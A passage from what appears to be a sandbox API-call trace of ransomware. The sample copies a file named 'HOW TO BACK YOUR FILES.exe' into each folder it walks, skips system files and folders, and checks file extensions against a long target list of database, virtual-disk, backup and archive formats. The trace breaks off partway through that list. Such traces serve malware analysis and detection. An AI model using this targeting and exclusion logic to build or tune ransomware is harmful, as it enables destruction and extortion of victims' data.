Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.023] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.023] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.024] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.024] GetLastError () returned 0x0 [0065.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.024] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.024] CloseHandle (hObject=0x12c) returned 1 [0065.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.024] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.024] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.024] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.024] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.025] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.025] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.025] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.025] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.025] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.025] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.025] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="00010C6E", cAlternateFileName="")) returned 1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="aoldtz.exe") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2=".") returned 1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="..") returned 1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="windows") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="bootmgr") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="temp") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="pagefile.sys") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="boot") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="ids.txt") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="ntuser.dat") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="perflogs") returned -1 [0065.025] lstrcmpiW (lpString1="00010C6E", lpString2="MSBuild") returned -1 [0065.025] lstrlenW (lpString="00010C6E") returned 8 [0065.025] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned 82 [0065.025] lstrcpyW (in: lpString1=0x2cce4a2, lpString2="00010C6E" | out: lpString1="00010C6E") returned="00010C6E" [0065.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0065.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x31efc8 [0065.025] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0065.025] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.025] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.025] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.025] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.025] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0065.025] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0065.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.026] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 89 [0065.026] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.026] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.026] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.026] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.026] GetLastError () returned 0x0 [0065.026] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.026] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.026] CloseHandle (hObject=0x12c) returned 1 [0065.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.027] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.027] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.027] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.027] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.027] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.027] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.027] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.027] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.027] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="aoldtz.exe") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".") returned 1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="..") returned 1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="windows") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="bootmgr") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="temp") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="pagefile.sys") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="boot") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="ids.txt") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="ntuser.dat") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="perflogs") returned -1 [0065.027] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="MSBuild") returned -1 [0065.027] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0065.027] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*") returned 91 [0065.027] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="01_Music_auto_rated_at_5_stars.wpl" | out: lpString1="01_Music_auto_rated_at_5_stars.wpl") returned="01_Music_auto_rated_at_5_stars.wpl" [0065.028] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0065.028] lstrlenW (lpString="Ares865") returned 7 [0065.028] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0065.028] lstrlenW (lpString=".dll") returned 4 [0065.028] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".dll") returned 1 [0065.028] lstrlenW (lpString=".lnk") returned 4 [0065.028] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".lnk") returned 1 [0065.028] lstrlenW (lpString=".ini") returned 4 [0065.028] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".ini") returned 1 [0065.028] lstrlenW (lpString=".sys") returned 4 [0065.028] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".sys") returned 1 [0065.028] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0065.028] lstrlenW (lpString="bak") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0065.028] lstrlenW (lpString="ba_") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0065.028] lstrlenW (lpString="dbb") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0065.028] lstrlenW (lpString="vmdk") returned 4 [0065.028] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0065.028] lstrlenW (lpString="rar") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0065.028] lstrlenW (lpString="zip") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0065.028] lstrlenW (lpString="tgz") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0065.028] lstrlenW (lpString="vbox") returned 4 [0065.028] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0065.028] lstrlenW (lpString="vdi") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0065.028] lstrlenW (lpString="vhd") returned 3 [0065.028] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0065.028] lstrlenW (lpString="vhdx") returned 4 [0065.028] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0065.028] lstrlenW (lpString="avhd") returned 4 [0065.028] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0065.028] lstrlenW (lpString="db") returned 2 [0065.028] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0065.029] lstrlenW (lpString="db2") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0065.029] lstrlenW (lpString="db3") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0065.029] lstrlenW (lpString="dbf") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0065.029] lstrlenW (lpString="mdf") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0065.029] lstrlenW (lpString="mdb") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0065.029] lstrlenW (lpString="sql") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0065.029] lstrlenW (lpString="sqlite") returned 6 [0065.029] lstrcmpiW (lpString1="rs.wpl", lpString2="sqlite") returned -1 [0065.029] lstrlenW (lpString="sqlite3") returned 7 [0065.029] lstrcmpiW (lpString1="ars.wpl", lpString2="sqlite3") returned -1 [0065.029] lstrlenW (lpString="sqlitedb") returned 8 [0065.029] lstrcmpiW (lpString1="tars.wpl", lpString2="sqlitedb") returned 1 [0065.029] lstrlenW (lpString="xml") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0065.029] lstrlenW (lpString="$er") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0065.029] lstrlenW (lpString="4dd") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0065.029] lstrlenW (lpString="4dl") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0065.029] lstrlenW (lpString="^^^") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0065.029] lstrlenW (lpString="abs") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0065.029] lstrlenW (lpString="abx") returned 3 [0065.029] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0065.029] lstrlenW (lpString="accdb") returned 5 [0065.029] lstrcmpiW (lpString1="s.wpl", lpString2="accdb") returned 1 [0065.029] lstrlenW (lpString="accdc") returned 5 [0065.029] lstrcmpiW (lpString1="s.wpl", lpString2="accdc") returned 1 [0065.029] lstrlenW (lpString="accde") returned 5 [0065.030] lstrcmpiW (lpString1="s.wpl", lpString2="accde") returned 1 [0065.030] lstrlenW (lpString="accdr") returned 5 [0065.030] lstrcmpiW (lpString1="s.wpl", lpString2="accdr") returned 1 [0065.030] lstrlenW (lpString="accdt") returned 5 [0065.030] lstrcmpiW (lpString1="s.wpl", lpString2="accdt") returned 1 [0065.030] lstrlenW (lpString="accdw") returned 5 [0065.030] lstrcmpiW (lpString1="s.wpl", lpString2="accdw") returned 1 [0065.030] lstrlenW (lpString="accft") returned 5 [0065.030] lstrcmpiW (lpString1="s.wpl", lpString2="accft") returned 1 [0065.030] lstrlenW (lpString="adb") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.030] lstrlenW (lpString="adb") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.030] lstrlenW (lpString="ade") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0065.030] lstrlenW (lpString="adf") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0065.030] lstrlenW (lpString="adn") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0065.030] lstrlenW (lpString="adp") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0065.030] lstrlenW (lpString="alf") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0065.030] lstrlenW (lpString="ask") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0065.030] lstrlenW (lpString="btr") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0065.030] lstrlenW (lpString="cat") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0065.030] lstrlenW (lpString="cdb") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0065.030] lstrlenW (lpString="ckp") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0065.030] lstrlenW (lpString="cma") returned 3 [0065.030] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0065.030] lstrlenW (lpString="cpd") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0065.031] lstrlenW (lpString="dacpac") returned 6 [0065.031] lstrcmpiW (lpString1="rs.wpl", lpString2="dacpac") returned 1 [0065.031] lstrlenW (lpString="dad") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0065.031] lstrlenW (lpString="dadiagrams") returned 10 [0065.031] lstrcmpiW (lpString1="_stars.wpl", lpString2="dadiagrams") returned -1 [0065.031] lstrlenW (lpString="daschema") returned 8 [0065.031] lstrcmpiW (lpString1="tars.wpl", lpString2="daschema") returned 1 [0065.031] lstrlenW (lpString="db-journal") returned 10 [0065.031] lstrcmpiW (lpString1="_stars.wpl", lpString2="db-journal") returned -1 [0065.031] lstrlenW (lpString="db-shm") returned 6 [0065.031] lstrcmpiW (lpString1="rs.wpl", lpString2="db-shm") returned 1 [0065.031] lstrlenW (lpString="db-wal") returned 6 [0065.031] lstrcmpiW (lpString1="rs.wpl", lpString2="db-wal") returned 1 [0065.031] lstrlenW (lpString="dbc") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0065.031] lstrlenW (lpString="dbs") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0065.031] lstrlenW (lpString="dbt") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0065.031] lstrlenW (lpString="dbv") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0065.031] lstrlenW (lpString="dbx") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0065.031] lstrlenW (lpString="dcb") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0065.031] lstrlenW (lpString="dct") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dct") returned 1 [0065.031] lstrlenW (lpString="dcx") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="dcx") returned 1 [0065.031] lstrlenW (lpString="ddl") returned 3 [0065.031] lstrcmpiW (lpString1="wpl", lpString2="ddl") returned 1 [0065.031] lstrlenW (lpString="dlis") returned 4 [0065.031] lstrcmpiW (lpString1=".wpl", lpString2="dlis") returned -1 [0065.031] lstrlenW (lpString="dp1") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="dp1") returned 1 [0065.032] lstrlenW (lpString="dqy") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="dqy") returned 1 [0065.032] lstrlenW (lpString="dsk") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="dsk") returned 1 [0065.032] lstrlenW (lpString="dsn") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="dsn") returned 1 [0065.032] lstrlenW (lpString="dtsx") returned 4 [0065.032] lstrcmpiW (lpString1=".wpl", lpString2="dtsx") returned -1 [0065.032] lstrlenW (lpString="dxl") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="dxl") returned 1 [0065.032] lstrlenW (lpString="eco") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="eco") returned 1 [0065.032] lstrlenW (lpString="ecx") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="ecx") returned 1 [0065.032] lstrlenW (lpString="edb") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="edb") returned 1 [0065.032] lstrlenW (lpString="epim") returned 4 [0065.032] lstrcmpiW (lpString1=".wpl", lpString2="epim") returned -1 [0065.032] lstrlenW (lpString="fcd") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="fcd") returned 1 [0065.032] lstrlenW (lpString="fdb") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="fdb") returned 1 [0065.032] lstrlenW (lpString="fic") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="fic") returned 1 [0065.032] lstrlenW (lpString="flexolibrary") returned 12 [0065.032] lstrcmpiW (lpString1="_5_stars.wpl", lpString2="flexolibrary") returned -1 [0065.032] lstrlenW (lpString="fm5") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="fm5") returned 1 [0065.032] lstrlenW (lpString="fmp") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="fmp") returned 1 [0065.032] lstrlenW (lpString="fmp12") returned 5 [0065.032] lstrcmpiW (lpString1="s.wpl", lpString2="fmp12") returned 1 [0065.032] lstrlenW (lpString="fmpsl") returned 5 [0065.032] lstrcmpiW (lpString1="s.wpl", lpString2="fmpsl") returned 1 [0065.032] lstrlenW (lpString="fol") returned 3 [0065.032] lstrcmpiW (lpString1="wpl", lpString2="fol") returned 1 [0065.032] lstrlenW (lpString="fp3") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="fp3") returned 1 [0065.033] lstrlenW (lpString="fp4") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="fp4") returned 1 [0065.033] lstrlenW (lpString="fp5") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="fp5") returned 1 [0065.033] lstrlenW (lpString="fp7") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="fp7") returned 1 [0065.033] lstrlenW (lpString="fpt") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="fpt") returned 1 [0065.033] lstrlenW (lpString="frm") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="frm") returned 1 [0065.033] lstrlenW (lpString="gdb") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0065.033] lstrlenW (lpString="gdb") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0065.033] lstrlenW (lpString="grdb") returned 4 [0065.033] lstrcmpiW (lpString1=".wpl", lpString2="grdb") returned -1 [0065.033] lstrlenW (lpString="gwi") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="gwi") returned 1 [0065.033] lstrlenW (lpString="hdb") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="hdb") returned 1 [0065.033] lstrlenW (lpString="his") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="his") returned 1 [0065.033] lstrlenW (lpString="ib") returned 2 [0065.033] lstrcmpiW (lpString1="pl", lpString2="ib") returned 1 [0065.033] lstrlenW (lpString="idb") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="idb") returned 1 [0065.033] lstrlenW (lpString="ihx") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="ihx") returned 1 [0065.033] lstrlenW (lpString="itdb") returned 4 [0065.033] lstrcmpiW (lpString1=".wpl", lpString2="itdb") returned -1 [0065.033] lstrlenW (lpString="itw") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="itw") returned 1 [0065.033] lstrlenW (lpString="jet") returned 3 [0065.033] lstrcmpiW (lpString1="wpl", lpString2="jet") returned 1 [0065.033] lstrlenW (lpString="jtx") returned 3 